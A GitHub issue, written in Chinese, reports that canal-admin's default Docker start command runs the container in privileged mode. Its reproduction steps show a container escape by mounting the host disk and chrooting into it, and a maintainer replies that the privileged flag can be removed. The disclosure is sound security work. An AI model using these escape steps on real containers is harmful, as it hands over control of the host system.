### ISSUE TITLE
 canal/canal-admin 默认启动的docker容器存在docker逃逸问题

### ISSUE THREAD

**Issue by wxi3** [alibaba/canal#5337]
- [* ] I have searched the [issues](https://github.com/alibaba/canal/issues) of this repository and believe that this is not a duplicate.
- [ *] I have checked the [FAQ](https://github.com/alibaba/canal/wiki/FAQ) of this repository and believe that this is not a duplicate.

### environment

*  canal/canal-admin 1.1.8
* mysql version

### Issue Description
canal-admin 默认的启动命令
<img width="970" alt="图片" src="https://github.com/user-attachments/assets/43384a9c-f00e-497b-a5fc-5bd3915a4038">
<img width="1120" alt="图片" src="https://github.com/user-attachments/assets/f493b7a3-a85f-4c5b-a31a-0d584e102455">

实际的启动命令
<img width="1506" alt="图片" src="https://github.com/user-attachments/assets/281422de-62cc-49fd-b624-c34728a41e84">

```
docker run -d --privileged=true -it -h 192.168.88.42 -e server.port=8089 -e canal.adminUser=admin -e canal.adminPasswd=admin --name=canal-admin -p 8089:8089 -m 1024m canal/canal-admin
```
该方式启动使用了特权模式，会导致可直接逃逸到宿主机内

<img width="993" alt="图片" src="https://github.com/user-attachments/assets/ac87af08-4d69-493a-8100-712481ee22f0">

### Steps to reproduce
```
[root@192 admin]# mkdir /tmp/mnt
[root@192 admin]# fdisk -l

Disk /dev/sda: 32.2 GB, 32212254720 bytes, 62914560 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x000a1816

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048    62914526    31456239+  83  Linux
[root@192 admin]# mount /dev/sda1 /tmp/mnt
[root@192 admin]# cd /tmp/mnt
[root@192 mnt]# chroot ./ bash
[root@192 /]# ls
bin  boot  data  dev  etc  home  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
```

### Actual behaviour

If there is an exception, please attach the exception trace:

```
Just put your stack trace here!
```

**Comment by agapple** [comment]
```
# systemctl start sshd
# systemctl start crond
```
已经去掉了systemctl的启动，可以忽略掉特权启动的属性
